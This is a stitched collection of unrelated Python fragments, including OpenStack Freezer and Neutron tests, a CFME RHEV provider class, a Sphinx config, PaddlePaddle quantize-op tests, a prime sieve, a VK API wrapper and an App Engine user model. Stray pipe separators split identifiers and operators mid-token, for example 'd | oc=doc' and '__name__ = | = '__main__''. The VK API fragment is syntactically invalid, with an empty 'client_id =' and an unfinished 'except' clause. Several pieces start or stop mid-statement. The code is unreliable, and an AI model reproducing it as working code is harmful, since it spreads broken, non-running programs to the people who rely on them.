self.assertEqual(actionids[index], actionmap['action_id'])
def test_action_list_with_search_match_and_match_not(self):
count = 0
actionids = []
while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
if count in [4, 12]:
doc['freezer_action']['mode'] = 'nova'
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match_not': [{'mode': 'nova'}],
'match': [{'max_retries': 10}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 3)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(10, actionmap['max_retries'])
self.assertEqual('fs',
actionmap['freezer_action']['mode'])
def test_action_list_with_search_match_list(self):
count = 0
actionids = []
while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
if count in [4, 12]:
doc['freezer_action']['mode'] = 'nova'
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match': [{'max_retries': 10},
{'mode': 'nova'}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 2)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(10, actionmap['max_retries'])
self.assertEqual('nova',
actionmap['freezer_action']['mode'])
def test_action_list_with_search_match_not_list(self):
count = 0
actionids = []
while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
if count in [4, 12]:
doc['freezer_action']['mode'] = 'nova'
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match_not':
[{'mode': 'nova'},
{'max_retries': 5}]}
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=20,
offset=0,
search=search_opt)
self.assertIsNotNone(result)
self.assertEqual(len(result), 3)
for index in range(len(result)):
actionmap = result[index]
self.assertEqual(10, actionmap['max_retries'])
self.assertEqual('fs',
actionmap['freezer_action']['mode'])
def test_action_list_with_search_with_all_opt_one_match(self):
count = 0
actionids = []
| while (count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
if count in [0, 4, 8, 12, 16]:
doc['max_retries'] = 10
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
d | oc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
search_opt = {'match': [{'_all': '[{"max_retries": 10}]'}]}
|
import attr
from widgetastic.widget import View, Text
from widgetastic_patternfly import Tab, Input, BootstrapSwitch, Button
from wrapanapi.rhevm import RHEVMSystem
from cfme.common.candu_views import VMUtilizationView
from cfme.common.provider import CANDUEndpoint, DefaultEndpoint, DefaultEndpointForm
from cfme.common.provider_views import BeforeFillMixin
from cfme.exceptions import ItemNotFound
from cfme.services.catalogs.catalog_items import RHVCatalogItem
from cfme.utils import version
from widgetastic_manageiq import LineChart
from . import InfraProvider
class RHEVMEndpoint(DefaultEndpoint):
@property
def view_value_mapping(self):
tls_since_version = '5.8.0.8'
return {'hostname': self.hostname,
'api_port': getattr(self, 'api_port', None),
'verify_tls': version.pick({
version.LOWEST: None,
tls_since_version: getattr(self, 'verify_tls', None)}),
'ca_certs': version.pick({
version.LOWEST: None,
tls_since_version: getattr(self, 'ca_certs', None)})
}
class RHEVMEndpointForm(View):
@View.nested
class default(Tab, DefaultEndpointForm, BeforeFillMixin): # NOQA
TAB_NAME = 'Default'
api_port = Input('default_api_port')
verify_tls = BootstrapSwitch(id='default_tls_verify')
ca_certs = Input('default_tls_ca_certs')
@View.nested
class candu(Tab, BeforeFillMixin): # NOQA
TAB_NAME = 'C & U Database'
hostname = Input('metrics_hostname')
api_port = Input('metrics_api_port')
database_name = Input('metrics_database_name')
username = Input('metrics_userid')
password = Input('metrics_password')
confirm_password = Input('metrics_verify')
change_password = Text(locator='.//a[normalize-space(.)="Change stored password"]')
validate = Button('Validate')
class RHEVMVMUtilizationView(VMUtilizationView):
"""A VM Utilization view for rhevm providers"""
vm_cpu = LineChart(id='miq_chart_parent_candu_0')
vm_memory = LineChart(id='miq_chart_parent_candu_1')
vm_disk = LineChart(id='miq_chart_parent_candu_2')
vm_network = LineChart(id='miq_chart_parent_candu_3')
@attr.s(hash=False)
class RHEVMProvider(InfraProvider):
catalog_item_type = RHVCatalogItem
vm_utilization_view = RHEVMVMUtilizationView
type_name = "rhevm"
mgmt_class = RHEVMSystem
db_types = ["Redhat::InfraManager"]
endpoints_form = RHEVMEndpointForm
discover_dict = {"rhevm": True}
settings_key = 'ems_redhat'
# xpath locators for elements, to be used by selenium
_console_connection_status_element = '//*[@id="connection-status"]|//*[@id="message-div"]'
_canvas_element = | '(//*[@id="remote-console"]/canva | s|//*[@id="spice-screen"]/canvas)'
_ctrl_alt_del_xpath = '//*[@id="ctrlaltdel"]'
_fullscreen_xpath = '//*[@id="fullscreen"]'
bad_credentials_error_msg = "Credential validation was not successful"
ems_events = [
('vm_create', {'event_type': 'USER_ADD_VM_FINISHED_SUCCESS', 'vm_or_template_id': None}),
('vm_stop', {'event_type': 'USER_STOP_VM', 'vm_or_template_id': None}),
('vm_start', {'event_type': 'USER_RUN_VM', 'vm_or_template_id': None}),
('vm_delete', {'event_type': 'USER_REMOVE_VM_FINISHED', 'vm_or_template_id': None})
]
@property
def view_value_mapping(self):
return {
'name': self.name,
'prov_type': 'Red Hat Virtualization'
}
def deployment_helper(self, deploy_args):
""" Used in utils.virtual_machines """
if 'default_cluster' not in deploy_args:
return {'cluster': self.data['default_cluster']}
return {}
@classmethod
def from_config(cls, prov_config, prov_key):
endpoints = {}
for endp in prov_config['endpoints']:
for expected_endpoint in (RHEVMEndpoint, CANDUEndpoint):
if expected_endpoint.name == endp:
endpoints[endp] = expected_endpoint(**prov_config['endpoints'][endp])
if prov_config.get('discovery_range'):
start_ip = prov_config['discovery_range']['start']
end_ip = prov_config['discovery_range']['end']
else:
start_ip = end_ip = prov_config.get('ipaddress')
return cls.appliance.collections.infra_providers.instantiate(
prov_class=cls,
name=prov_config['name'],
endpoints=endpoints,
zone=prov_config.get('server_zone', 'default'),
key=prov_key,
start_ip=start_ip,
end_ip=end_ip)
# Following methods will only work if the remote console window is open
# and if selenium focused on it. These will not work if the selenium is
# focused on Appliance window.
def get_console_connection_status(self):
try:
return self.appliance.browser.widgetastic.selenium.find_element_by_xpath(
self._console_connection_status_element).text
except:
raise ItemNotFound("Element not found on screen, is current focus on console window?")
def get_remote_console_canvas(self):
try:
return self.appliance.browser.widgetastic.selenium.find_element_by_xpath(
self._canvas_element)
except:
raise ItemNotFound("Element not found on screen, is current focus on console window?")
def get_console_ctrl_alt_del_btn(self):
try:
return self.appliance.browser.widgetastic.selenium.find_element_by_xpath(
self._ctrl_alt_del_xpath)
except:
raise ItemNotFound("Element not found on screen, is current focus on console window?")
def get_console_fullscreen_btn(self):
try:
return self.appliance.browser.widgetastic.selenium.find_element_by_xpath(
self._fullscreen_xpath)
except:
raise ItemNotFound("Element not found on screen, is current focus on console window?")
|
#!/usr/bin/env python3
from distutils.core import setup
from catkin_pkg.python_setup impo | rt generate_distutils_setup
d = generate_distutils_setup(
packages=['lg_keyboard'],
package_dir={'': 'src'},
scripts=[],
requires=[]
)
setup(**d)
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# clamm documentation build configuration file, created by
# sphinx-quickstart on Thu Mar 2 20:47:20 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../clamm'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.napoleon']
napoleon_numpy_docstring = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'clamm'
copyright = '2017, Paul Adams'
author = 'Paul Adams'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
h | tml_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'clammdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterp | aper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'clamm.tex', 'clamm Documentation',
'Paul Adams', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'clamm', 'clamm Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'clamm', 'clamm Documentation',
author, 'clamm', 'One line description of project.',
'Miscellaneous'),
]
|
#############################################################################
##
## Copyright (C) 2015 The Qt Company Ltd.
## Contact: http://www.qt.io/licensing
##
## This file is part of Qt Creator.
##
## Commercial License Usage
## Licensees holding valid commercial Qt licenses may use this file in
## accordance with the commercial license agreement provided with the
## Software or, alternatively, in accordance with the terms contained in
## a written agreement between you and The Qt Company. For licensing terms and
## conditions see http://www.qt.io/terms-conditions. For further information
## use the contact form at http://www.qt.io/contact-us.
##
## GNU Lesser General Public License Usage
## Alternatively, this file may be used under the terms of the GNU Lesser
## General Public License version 2.1 or version 3 as published by the Free
## Software Foundation and appearing in the file LICENSE.LGPLv21 and
## LICENSE.LGPLv3 included in the packaging of this file. Please review the
## following information to ensure the GNU Lesser General Public License
## requirements will be met: https://www.gnu.org/licenses/lgpl.html and
## http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
##
## In addition, as a special exception, The Qt Company gives you certain additional
## rights. These rights are described in The Qt Company LGPL Exception
## version 1.1, included in the file LGPL_EXCEPTION.txt in this package.
##
#############################################################################
source("../../shared/qtcreator.py")
import re
SpeedCrunchPath = ""
def buildConfigFromFancyToolButton(fancyToolButton):
beginOfBuildConfig = "<b>Build:</b> "
endOfBuildConfig = "<br/><b>Deploy:</b>"
toolTipText = str(fancyToolButton.toolTip)
beginIndex = toolTipText.find(beginOfBuildConfig) + len(beginOfBuildConfig)
endIndex = toolTipText.find(endOfBuildConfig)
return toolTipText[beginIndex:endIndex]
def main():
if not neededFilePresent(SpeedCrunchPath):
return
startApplication("qtcreator" + SettingsPath)
if not startedWithoutPluginError():
return
suitableKits = Targets.DESKTOP_480_GCC
if platform.system() in ('Windows', 'Microsoft'):
suitableKits |= Targets.DESKTOP_480_MSVC2010
checkedTargets = openQmakeProject(SpeedCrunchPath, suitableKits)
progressBarWait(30000)
fancyToolButton = waitForObject(":*Qt Creator_Core::Internal::FancyToolButton")
availableConfigs = iterateBuildConfigs(len(checkedTargets), "Release")
if not availableConfigs:
test.fatal("Haven't found a suitable Qt version (need Release build) - leaving without building.")
for kit, config in availableConfigs:
selectBuildConfig(len(checkedTargets), kit, config)
buildConfig = buildConfigFromFancyToolButton(fancyToolButton)
if build | Config != config:
test.fatal("Build configuration %s is selected instead of %s" % (buildConfig, config))
continue
test.log("Testing build configuration: " + config)
if not JIRA.isBugStillOpen(13700):
invokeMenuItem("Build", "Run qmake")
waitForCompile()
invokeMenuItem("Build", "Rebuild All")
waitForCompile(300000)
checkCompile()
checkLastBuild()
| # Add a new run configuration
invokeMenuItem("File", "Exit")
def init():
global SpeedCrunchPath
SpeedCrunchPath = os.path.join(srcPath, "creator-test-data", "speedcrunch", "src", "speedcrunch.pro")
cleanup()
def cleanup():
# Make sure the .user files are gone
cleanUpUserFiles(SpeedCrunchPath)
for dir in glob.glob(os.path.join(srcPath, "creator-test-data", "speedcrunch", "speedcrunch-build-*")):
deleteDirIfExists(dir)
|
import shipane_sdk
# 初始化函数,设定要操作的 | 股票、基准等等
def initialize(context):
# 定义一个全局变量, 保存要操作的股票
# 000001(股票:平安银行)
g.security = '000001.XSHE'
# 设定沪深300作为基准
set_benchmark('000300.XSHG')
def process_initialize(context):
# 创建 StrategyManager 对象
# 参数为配置文件中的 manager id
g.__manager = shipane_sdk.JoinQuantStrategyManagerFactory(context).create('manager-1')
# 每个单位时间(如果按天回测,则每天调用一次,如果按分钟,则每分钟调用一次)调用一次
def handle_data(context, data):
# 保存 order 对象
or | der_ = order(g.security, 100)
# 实盘易依据聚宽的 order 对象下单
g.__manager.execute(order_)
order_ = order(g.security, -100)
g.__manager.execute(order_)
# 撤单
g.__manager.cancel(order_)
|
pplicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from oslo_versionedobjects import base as obj_base
from oslo_versionedobjects import fields as obj_fields
import testtools
from neutron.api.rpc.callbacks import resources
from neutron.api.rpc.handlers import resources_rpc
from neutron.common import topics
from neutron import context
from neutron.objects import base as objects_base
from neutron.tests import base
def _create_test_dict():
return {'id': 'uuid',
'field': 'foo'}
def _create_test_resource(context=None):
resource_dict = _create_test_dict()
resource = FakeResource(context, **resource_dict)
resource.obj_reset_changes()
return resource
@obj_base.VersionedObjectRegistry.register
class FakeResource(objects_base.NeutronObject):
fields = {
'id': obj_fields.UUIDField(),
'field': obj_fields.StringField()
}
@classmethod
def get_objects(cls, context, **kwargs):
return list()
class ResourcesRpcBaseTestCase(base.BaseTestCase):
def setUp(self):
super(ResourcesRpcBaseTestCase, self).setUp()
self.context = context.get_admin_context()
class _ValidateResourceTypeTestCase(base.BaseTestCase):
def setUp(self):
super(_ValidateResourceTypeTestCase, self).setUp()
self.is_valid_mock = mock.patch.object(
resources_rpc.resources, 'is_valid_resource_type').start()
def test_valid_type(self):
self.is_valid_mock.return_value = True
resources_rpc._validate_resource_type('foo')
def test_invalid_type(self):
self.is_valid_mock.return_value = False
with testtools.ExpectedException(
resources_rpc.InvalidResourceTypeClass):
resources_rpc._validate_resource_type('foo')
class _ResourceTypeVersionedTopicTestCase(base.BaseTestCase):
@mock.patch.object(resources_rpc, '_validate_resource_type')
def test_resource_type_versioned_topic(self, validate_mock):
obj_name = FakeResource.obj_name()
expected = topics.RESOURCE_TOPIC_PATTERN % {
'resource_type': 'FakeResource', 'version': '1.0'}
with mock.patch.object(resources_rpc.resources, 'get_resource_cls',
return_value=FakeResource):
observed = resources_rpc.resource_type_versioned_topic(obj_name)
self.assertEqual(expected, observed)
class ResourcesPullRpcApiTestCase(ResourcesRpcBaseTestCase):
def setUp(self):
super(ResourcesPullRpcApiTestCase, self).setUp()
mock.patch.object(resources_rpc, '_validate_resource_type').start()
mock.patch('neutron.api.rpc.callbacks.resources.get_resource_cls',
return_value=FakeResource).start()
self.rpc = resources_rpc.ResourcesPullRpcApi()
mock.patch.object(self.rpc, 'client').start()
self.cctxt_mock = self.rpc.client.prepare.return_value
def test_is_singleton(self):
self.assertIs(self.rpc, resources_rpc.ResourcesPullRpcApi())
def test_pull(self):
expected_obj = _create_test_resource(self.context)
resource_id = expected_obj.id
self.cctxt_mock.call.return_value = expected_obj.obj_to_primitive()
result = self.rpc.pull(
self.context, FakeResource.obj_name(), resource_id)
self.cctxt_mock.call.assert_called_once_with(
self.context, 'pull', resource_type='FakeResource',
version=FakeResource.VERSION, resource_id=resource_id)
self.assertEqual(expected_obj, result)
def test_pull_resource_not_found(self):
resource_dict = _create_test_dict()
resource_id = resource_dict['id']
self.cctxt_mock.call.return_value = None
with testtools.ExpectedException(resources_rpc.ResourceNotFound):
self.rpc.pull(self.context, FakeResource.obj_name(),
resourc | e_id)
class ResourcesPullRpcCallbackTestCase(ResourcesRpcBaseTestCase):
def setUp(self):
super(ResourcesPullRpcCallbackTestCase, self).setUp()
self.callbacks = resources_rpc.ResourcesPullRpcCallback()
self.resource_obj = _create_test_resource(self.context)
def test_pull(self):
resource_dict = _create_test_dict()
with mo | ck.patch.object(
resources_rpc.prod_registry, 'pull',
return_value=self.resource_obj) as registry_mock:
primitive = self.callbacks.pull(
self.context, resource_type=FakeResource.obj_name(),
version=FakeResource.VERSION,
resource_id=self.resource_obj.id)
registry_mock.assert_called_once_with(
'FakeResource', self.resource_obj.id, context=self.context)
self.assertEqual(resource_dict,
primitive['versioned_object.data'])
self.assertEqual(self.resource_obj.obj_to_primitive(), primitive)
@mock.patch.object(FakeResource, 'obj_to_primitive')
def test_pull_no_backport_for_latest_version(self, to_prim_mock):
with mock.patch.object(resources_rpc.prod_registry, 'pull',
return_value=self.resource_obj):
self.callbacks.pull(
self.context, resource_type=FakeResource.obj_name(),
version=FakeResource.VERSION,
resource_id=self.resource_obj.id)
to_prim_mock.assert_called_with(target_version=None)
@mock.patch.object(FakeResource, 'obj_to_primitive')
def test_pull_backports_to_older_version(self, to_prim_mock):
with mock.patch.object(resources_rpc.prod_registry, 'pull',
return_value=self.resource_obj):
self.callbacks.pull(
self.context, resource_type=FakeResource.obj_name(),
version='0.9', # less than initial version 1.0
resource_id=self.resource_obj.id)
to_prim_mock.assert_called_with(target_version='0.9')
class ResourcesPushRpcApiTestCase(ResourcesRpcBaseTestCase):
def setUp(self):
super(ResourcesPushRpcApiTestCase, self).setUp()
mock.patch.object(resources_rpc.n_rpc, 'get_client').start()
mock.patch.object(resources_rpc, '_validate_resource_type').start()
self.rpc = resources_rpc.ResourcesPushRpcApi()
self.cctxt_mock = self.rpc.client.prepare.return_value
self.resource_obj = _create_test_resource(self.context)
def test__prepare_object_fanout_context(self):
expected_topic = topics.RESOURCE_TOPIC_PATTERN % {
'resource_type': resources.get_resource_type(self.resource_obj),
'version': self.resource_obj.VERSION}
with mock.patch.object(resources_rpc.resources, 'get_resource_cls',
return_value=FakeResource):
observed = self.rpc._prepare_object_fanout_context(
self.resource_obj)
self.rpc.client.prepare.assert_called_once_with(
fanout=True, topic=expected_topic)
self.assertEqual(self.cctxt_mock, observed)
def test_pushy(self):
with mock.patch.object(resources_rpc.resources, 'get_resource_cls',
return_value=FakeResource):
self.rpc.push(
self.context, self.resource_obj, 'TYPE')
self.cctxt_mock.cast.assert_called_once_with(
self.context, 'push',
resource=self.resource_obj.obj_to_primitive(),
event_type='TYPE')
class ResourcesPushRpcCallbackTestCase(ResourcesRpcBaseTestCase):
def setUp(self):
super(ResourcesPushRpcCallbackTestCase, self).setUp()
mock.patch.object(resources_rpc, '_validate_resource_type').start()
mock.patch.object(
resources_rpc.resources,
'get_resource_cls', return_value=FakeResource).start()
self.resource_obj = _create_test_resource(self.context)
self.resource_prim = self.resource_obj.obj_to_primitiv |
#!/usr/bin/env python
traindat = '../data/fm_train_real.dat'
testdat = '../data/fm_test_real.dat'
parameter_list = [[traindat,testdat,2 | ,10], [traindat,testdat,5,10]]
def kernel_anova_modular (train_fname=traindat,test_fname=testdat,cardinality=2, size_cache=10):
from modshogun import ANOVAKernel,RealFeatures,CSVFile
feats_train=RealFeatures(CSVFile(train_fname))
feats_test=Real | Features(CSVFile(test_fname))
kernel=ANOVAKernel(feats_train, feats_train, cardinality, size_cache)
km_train=kernel.get_kernel_matrix()
kernel.init(feats_train, feats_test)
km_test=kernel.get_kernel_matrix()
return km_train, km_test, kernel
if __name__=='__main__':
print('ANOVA')
kernel_anova_modular(*parameter_list[0])
|
from math import sqrt
def main():
n = int(input("Enter n : "))
boolArr = [True for i in range(n + 1)]
boolArr[0] = boolArr[1] = False
for i in range(2, int(sqrt(n) + 1)):
if boolArr[i] is True:
for j in range(i * i, n + 1, i):
# print(boolArr)
boo | lArr[j] = False
for i in range(2, n + 1):
if boolArr[i] is True:
print(i)
if __name__ = | = '__main__':
main()
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from op_test import OpTest
import paddle.fluid.core as core
class TestFakeQuantizeOp(OpTest):
def setUp(self):
self.op_type = "fake_quantize_abs_max"
self.attrs = {'bit_length': 8}
self.inputs = {'X': np.random.random((124, 240)).astype("float32"), }
scale = np.max(np.abs(self.inputs['X'])).astype("float32")
self.outputs = {
'Out': np.round(self.inputs['X'] / scale * (
(1 << (self.attrs['bit_length'] - 1)) - 1)),
'OutScale': np.array(scale).astype("float32"),
}
def test_check_output(self):
self.check_output()
class TestFakeChannelWiseQuantizeOp(OpTest):
def setUp(self):
self.op_type = "fake_channel_wise_quantize_abs_max"
self.attrs = {'bit_length': 8}
self.inputs = {
'X': np.random.random((4, 3, 64, 64)).astype("float32"),
}
scales = []
for i in range(self.inputs['X'].shape[0]):
scales.append(np.max(np.abs(self.inputs['X'][i])).astype("float32"))
outputs = self.inputs['X'].copy()
for i, scale in enumerate(scales):
outputs[i] = np.round(outputs[i] / scale * (
(1 << (self.attrs['bit_length'] - 1)) - 1))
self.outputs = {
'Out': outputs,
'OutScale': np.array(scales).astype("float32"),
}
def test_check_output(self):
self.check_output()
class TestFakeQuantizeRangeAbsMaxOp(OpTest):
def setUp(self):
self.op_type = "fake_quantize_range_abs_max"
self.attrs = {
'bit_length': int(5),
'window_size': int(1),
'is_test': False
}
x = (np.random.random((8, 16, 7, 7)) - 0.5) * 10
x = x.astype("float32")
self.inputs = {
'X': x,
'Iter': np.zeros(1).astype("int64"),
'InScale': np.zeros(1).astype("float32")
}
scale = np.max(np.abs(self.inputs['X'])).astype("float32")
out_scales = np.zeros(self.attrs['window_size']).astype("float32")
ou | t_scales[0] = scale
self.outputs = {
'Out': np.round(self.inputs['X'] / scale * (
(1 << (self.attrs['bit_length'] - 1)) - 1)),
'OutScale': scale,
'OutScales': out_scales,
}
def test_check_output(self):
self.check_output()
class TestFakeQuantizeMovingOp(OpTest):
def setUp(self):
self.op_type = "fake_quantize_moving_ave | rage_abs_max"
self.attrs = {
'bit_length': int(5),
'moving_rate': float(0.9),
'is_test': False
}
accum = np.zeros(1).astype("float32")
accum[0] = 1
state = np.zeros(1).astype("float32")
state[0] = 1
scale = np.zeros(1).astype("float32")
scale[0] = 0.001
self.inputs = {
'X': np.random.random((8, 16, 7, 7)).astype("float32"),
'InScale': scale,
'InAccum': accum,
'InState': state,
}
out_accum = np.zeros(1).astype("float32")
out_state = np.zeros(1).astype("float32")
out_scale = np.zeros(1).astype("float32")
out_accum[0] = self.attrs['moving_rate'] * accum[0] + np.max(
np.abs(self.inputs['X'])).astype("float32")
out_state[0] = self.attrs['moving_rate'] * state[0] + 1
out_scale = out_accum / out_state
self.outputs = {
'Out': np.round(self.inputs['X'] / out_scale * (
(1 << (self.attrs['bit_length'] - 1)) - 1)),
'OutAccum': out_accum,
'OutState': out_state,
'OutScale': out_scale,
}
def test_check_output(self):
self.check_output()
class TestFakeQuantizeRangeAbsMaxOp2(OpTest):
def setUp(self):
self.op_type = "fake_quantize_range_abs_max"
self.attrs = {
'bit_length': int(8),
'window_size': int(1),
'is_test': True
}
x = (np.random.random((8, 16, 7, 7)) - 0.5) * 10
x = x.astype("float32")
scale = np.max(np.abs(x)).astype("float32") - 1.0
out_scales = np.zeros(self.attrs['window_size']).astype("float32")
out_scales[0] = scale
self.inputs = {
'X': x,
'Iter': np.zeros(1).astype("int64"),
'InScale': scale.astype("float32")
}
xs = np.clip(x, -scale, scale)
qs = np.round(xs / scale * ((1 << (self.attrs['bit_length'] - 1)) - 1))
self.outputs = {
'Out': qs,
'OutScale': scale.astype("float32"),
'OutScales': out_scales,
}
def test_check_output(self):
self.check_output(no_check_set=set(['OutScale', 'OutScales']))
if __name__ == "__main__":
unittest.main()
|
# vkapi.py
#
# Copyright 2016 Igor Unixoid Kolonchenko <enepunixoid@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the impl | ied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this pr | ogram; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
import requests
import sys
class vkapi(object):
redirect_url = ''
scope = 0 '''Разрешение прав доступа'''
access_token = ''
client_id =
"""
https://oauth.vk.com/authorize?
client_id=1&display=page&redirect_uri=http://example.com/callback
&scope=friends&response_type=token&v=5.57&state=123456
"""
def __init__(self,_ci,_ru,_scope):
self.redirect_url == _ru
self.scope = _scope
self.client_id = _ci
def auth(login,passwd):
url = "https://oauth.vk.com/authorize"
params["client_id"] = self.client_id
params["display"] = "mobile"
params["redirecct_url"] = self.redirect_url
params["scope"] = self.scope
params["response_type"]="token"
try:
res = requests.get(url,params)
except requests.
|
from webapp2_extras.appengine.auth.models import User
from google.appengine.ext import ndb
class User(User):
"""
Universal user model. Can be used with App Engine's default users API,
own auth or third party authentication methods (OpenID, OAuth etc).
based on https://gist.github.com/kylefinley
"""
#: Creation date.
created = ndb.DateTimeProperty(auto_now_add=True)
#: Modification date.
updated = ndb.DateTimeProperty(auto_now=True)
#: User defined unique name, also used as key_name.
# Not used by OpenID
username = ndb.StringProperty()
#: User Name
name = ndb.StringProperty()
#: User Last Name
last_name = ndb.StringProperty()
#: User email
email = ndb.StringProperty()
#: Hashed password | . Only set for own authentication.
# Not required beca | use third party authentication
# doesn't use password.
password = ndb.StringProperty()
#: User Country
country = ndb.StringProperty()
#: User TimeZone
tz = ndb.StringProperty()
#: Account activation verifies email
activated = ndb.BooleanProperty(default=False)
@classmethod
def get_by_email(cls, email):
"""Returns a user object based on an email.
:param email:
String representing the user email. Examples:
:returns:
A user object.
"""
return cls.query(cls.email == email).get()
@classmethod
def create_resend_token(cls, user_id):
entity = cls.token_model.create(user_id, 'resend-activation-mail')
return entity.token
@classmethod
def validate_resend_token(cls, user_id, token):
return cls.validate_token(user_id, 'resend-activation-mail', token)
@classmethod
def delete_resend_token(cls, user_id, token):
cls.token_model.get_key(user_id, 'resend-activation-mail', token).delete()
def get_social_providers_names(self):
social_user_objects = SocialUser.get_by_user(self.key)
result = []
# import logging
for social_user_object in social_user_objects:
# logging.error(social_user_object.extra_data['screen_name'])
result.append(social_user_object.provider)
return result
def get_social_providers_info(self):
providers = self.get_social_providers_names()
result = {'used': [], 'unused': []}
for k,v in SocialUser.PROVIDERS_INFO.items():
if k in providers:
result['used'].append(v)
else:
result['unused'].append(v)
return result
class LogVisit(ndb.Model):
user = ndb.KeyProperty(kind=User)
uastring = ndb.StringProperty()
ip = ndb.StringProperty()
timestamp = ndb.StringProperty()
class LogEmail(ndb.Model):
